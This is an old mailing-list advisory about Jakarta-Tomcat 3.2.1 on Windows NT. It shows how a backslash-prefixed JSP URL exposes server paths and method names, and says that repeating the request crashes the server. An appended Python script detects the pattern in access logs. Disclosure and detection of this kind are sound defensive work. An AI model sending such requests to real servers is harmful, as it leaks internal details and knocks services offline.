[LoWNOISE] Tomcat 3.2.1 ..0 DoS (WinNT)

From: ET LoWNOISE (etat_private)
Date: Thu Aug 16 2001 - 16:10:09 PDT


    --[ LoWNOISE ]  Aug/2001
    --[ Jakarta-Tomcat v3.2.1 Maybe Others ]
    
    Tested on: Apache 1.3.19 (WinNT 4.0)
    
    The Problems:
    
    --[Path Revealing and Method discovery ]
    
    Example:
    
    http://host/\index.jsp
    
    Error: 500
    Location: /index.jsp
    Internal Servlet Error:
    
    org.apache.jasper.JasperException: Unable to compile class for JSP
    C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:482:
    Method autenticate(java.lang.String) not found in class ENTERPRISE.login.
                    if(pubBean.autenticate(password) != 0)
                                               ^
    C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:664:
    Method 
    Other methods...
    
    NOTE: This info will help debug any jsp. And maybe give you some critical
    info.
    
    --[DoS]
    
    On multiple requests of the above URL the server will crash.
    
    Plz confirm this on other versions.
    
    Efrain 'ET' Torres
    [LoWNOISE] Colombia
    etat_private
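
An added detection example, not part of the original post: it scans Apache access-log lines for the request shape reported above (a path starting with `/\`, raw or `%5C`-encoded, naming a `.jsp` page and answered with 500) and lists clients that repeat it. The common log format, the threshold of 3 and the sample lines are assumptions made for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Apache common log format: host ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
REPEAT_THRESHOLD = 3  # assumed alerting threshold; tune per site


def is_backslash_jsp(path):
    """True when the URL-decoded path starts with '/\\' and names a .jsp page."""
    decoded = unquote(path.split("?", 1)[0])
    return decoded.startswith("/\\") and decoded.lower().endswith(".jsp")


def scan(lines, threshold=REPEAT_THRESHOLD):
    """Return (hits, repeat_clients) for backslash-JSP requests answered with 500."""
    hits, per_client = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["status"] == "500" and is_backslash_jsp(m["path"]):
            hits.append((m["client"], m["path"]))
            per_client[m["client"]] += 1
    repeat = sorted(c for c, n in per_client.items() if n >= threshold)
    return hits, repeat


# Constructed sample log lines (documentation addresses, not from the post).
SAMPLE = [
    r'192.0.2.10 - - [16/Aug/2001:16:00:01 -0700] "GET /\index.jsp HTTP/1.0" 500 2048',
    r'192.0.2.10 - - [16/Aug/2001:16:00:02 -0700] "GET /\index.jsp HTTP/1.0" 500 2048',
    r'192.0.2.10 - - [16/Aug/2001:16:00:03 -0700] "GET /%5Cindex.jsp HTTP/1.0" 500 2048',
    r'198.51.100.7 - - [16/Aug/2001:16:00:04 -0700] "GET /index.jsp HTTP/1.0" 200 5120',
    r'203.0.113.5 - - [16/Aug/2001:16:00:05 -0700] "GET /\login.jsp HTTP/1.0" 500 1900',
]

if __name__ == "__main__":
    hits, repeat = scan(SAMPLE)
    for client, path in hits:
        print(f"500 on backslash JSP path: {client} {path}")
    print("clients at or over threshold:", repeat)
```

A hit means the 500 page for that request should be checked for compiler output and filesystem paths like those shown in the post; a client in the repeat list matches the repeated-request condition described under DoS.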
    


